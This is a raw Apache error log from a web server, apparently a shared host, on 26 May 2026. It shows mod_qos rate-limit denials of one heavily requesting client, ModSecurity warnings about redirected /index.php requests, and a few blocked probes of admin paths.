[Tue May 26 20:00:09.027990 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8qAAAAFo
[Tue May 26 20:00:09.029065 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8qQAAACw
[Tue May 26 20:00:09.029212 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZZgAAAKk
[Tue May 26 20:00:09.030045 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8qwAAACI
[Tue May 26 20:00:09.032108 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8rQAAAHc
[Tue May 26 20:00:09.034040 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucWDRMqfxdEDkosz8rgAAAH8
[Tue May 26 20:00:09.038079 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucYZZc2DoU1lPnP1ZaAAAAI0
[Tue May 26 20:00:09.043165 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8swAAADA
[Tue May 26 20:00:09.048502 2026] [qos:error] [pid 106517:tid 106710] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucYZZc2DoU1lPnP1ZagAAAMA
[Tue May 26 20:00:09.178597 2026] [qos:error] [pid 106517:tid 106666] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZbwAAAJU
[Tue May 26 20:00:09.181358 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8twAAADc
[Tue May 26 20:00:09.181909 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZcAAAALo
[Tue May 26 20:00:09.183583 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8uAAAACE
[Tue May 26 20:00:09.184519 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8uQAAACo
[Tue May 26 20:00:09.185504 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8ugAAAGE
[Tue May 26 20:00:09.186267 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8uwAAAAQ
[Tue May 26 20:00:09.186829 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZcQAAAJo
[Tue May 26 20:00:09.200595 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8vQAAAEo
[Tue May 26 20:00:09.203481 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8vgAAACM
[Tue May 26 20:00:09.273577 2026] [security2:error] [pid 93576:tid 93720] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz50AAAAAg"]
[Tue May 26 20:00:09.277374 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YywAAALM"]
[Tue May 26 20:00:09.277500 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8PgAAAHw"]
[Tue May 26 20:00:09.277586 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YyAAAAN0"]
[Tue May 26 20:00:09.279508 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y0gAAAJA"]
[Tue May 26 20:00:09.279635 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YfAAAAQQ"]
[Tue May 26 20:00:09.282568 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8NAAAAAs"]
[Tue May 26 20:00:09.285361 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8MwAAAC8"]
[Tue May 26 20:00:09.289143 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1YzwAAAMc"]
[Tue May 26 20:00:09.290462 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y2AAAAKc"]
[Tue May 26 20:00:09.292992 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YcgAAALE"]
[Tue May 26 20:00:09.303570 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y2QAAAKM"]
[Tue May 26 20:00:09.314259 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8VwAAAA0"]
[Tue May 26 20:00:09.315614 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8LgAAAEQ"]
[Tue May 26 20:00:09.315829 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y1gAAAOo"]
[Tue May 26 20:00:09.329062 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y0wAAAOg"]
[Tue May 26 20:00:09.331312 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y2wAAAPw"]
[Tue May 26 20:00:09.345879 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8TQAAAGc"]
[Tue May 26 20:00:09.350737 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8WgAAAHY"]
[Tue May 26 20:00:09.352271 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub4ZZc2DoU1lPnP1Y3wAAAPg"]
[Tue May 26 20:00:09.356468 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8WQAAABs"]
[Tue May 26 20:00:09.362584 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8TAAAAGI"]
[Tue May 26 20:00:09.384014 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucGDRMqfxdEDkosz8dgAAAC0"]
[Tue May 26 20:00:09.399560 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZGAAAAQM"]
[Tue May 26 20:00:09.400330 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZGQAAALs"]
[Tue May 26 20:00:09.401276 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZBgAAAIk"]
[Tue May 26 20:00:09.409561 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZIAAAANw"]
[Tue May 26 20:00:09.413857 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWub2DRMqfxdEDkosz8WwAAAEk"]
[Tue May 26 20:00:09.417241 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZDAAAAJk"]
[Tue May 26 20:00:09.418177 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZBAAAANc"]
[Tue May 26 20:00:09.418773 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZEQAAAJ8"]
[Tue May 26 20:00:09.426863 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZBQAAAPc"]
[Tue May 26 20:00:09.430965 2026] [security2:error] [pid 106517:tid 106712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZHwAAAMI"]
[Tue May 26 20:00:09.441178 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucGDRMqfxdEDkosz8dwAAACg"]
[Tue May 26 20:00:09.478737 2026] [security2:error] [pid 106517:tid 106666] [client 103.163.220.12:23659] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/index/function.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZjQAAAJU"]
[Tue May 26 20:00:09.558860 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZrAAAANw
[Tue May 26 20:00:09.562090 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8-AAAAEY
[Tue May 26 20:00:09.564952 2026] [qos:error] [pid 106517:tid 106694] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucYZZc2DoU1lPnP1ZrQAAALA
[Tue May 26 20:00:09.567974 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucYZZc2DoU1lPnP1ZrgAAAK8
[Tue May 26 20:00:09.579329 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8-QAAAGc
[Tue May 26 20:00:09.582437 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZswAAAKo
[Tue May 26 20:00:09.583472 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8-gAAACw
[Tue May 26 20:00:09.584120 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8-wAAAG4
[Tue May 26 20:00:09.584825 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZtAAAAQI
[Tue May 26 20:00:09.592557 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz8_AAAACI
[Tue May 26 20:00:09.732360 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZugAAAO0
[Tue May 26 20:00:09.733913 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9AAAAAGI
[Tue May 26 20:00:09.734223 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9AQAAAE0
[Tue May 26 20:00:09.735273 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZvAAAANE
[Tue May 26 20:00:09.736513 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucYZZc2DoU1lPnP1ZvQAAAMY
[Tue May 26 20:00:09.743642 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9AgAAAA4
[Tue May 26 20:00:09.744259 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9AwAAADA
[Tue May 26 20:00:09.746278 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9BAAAAGY
[Tue May 26 20:00:09.756708 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9BQAAADg
[Tue May 26 20:00:09.759482 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucWDRMqfxdEDkosz9BgAAAGM
[Tue May 26 20:00:09.979222 2026] [security2:error] [pid 106517:tid 106759] [client 103.163.220.34:33295] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/admin/"] [unique_id "ahWucYZZc2DoU1lPnP1ZyAAAAPE"]
[Tue May 26 20:00:10.148047 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9CQAAAGs
[Tue May 26 20:00:10.153836 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1ZzwAAAK4
[Tue May 26 20:00:10.156927 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9CwAAAEk
[Tue May 26 20:00:10.156953 2026] [qos:error] [pid 106517:tid 106669] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1Z0AAAAJg
[Tue May 26 20:00:10.157867 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9DAAAAEw
[Tue May 26 20:00:10.158298 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1Z0QAAAM4
[Tue May 26 20:00:10.160356 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9DQAAACE
[Tue May 26 20:00:10.161562 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9DgAAACc
[Tue May 26 20:00:10.277617 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZGwAAAKA"]
[Tue May 26 20:00:10.293896 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZKwAAAQA"]
[Tue May 26 20:00:10.298864 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZMAAAAKg"]
[Tue May 26 20:00:10.306873 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9FwAAAGo
[Tue May 26 20:00:10.309891 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZLQAAAP8"]
[Tue May 26 20:00:10.310340 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZLgAAAOM"]
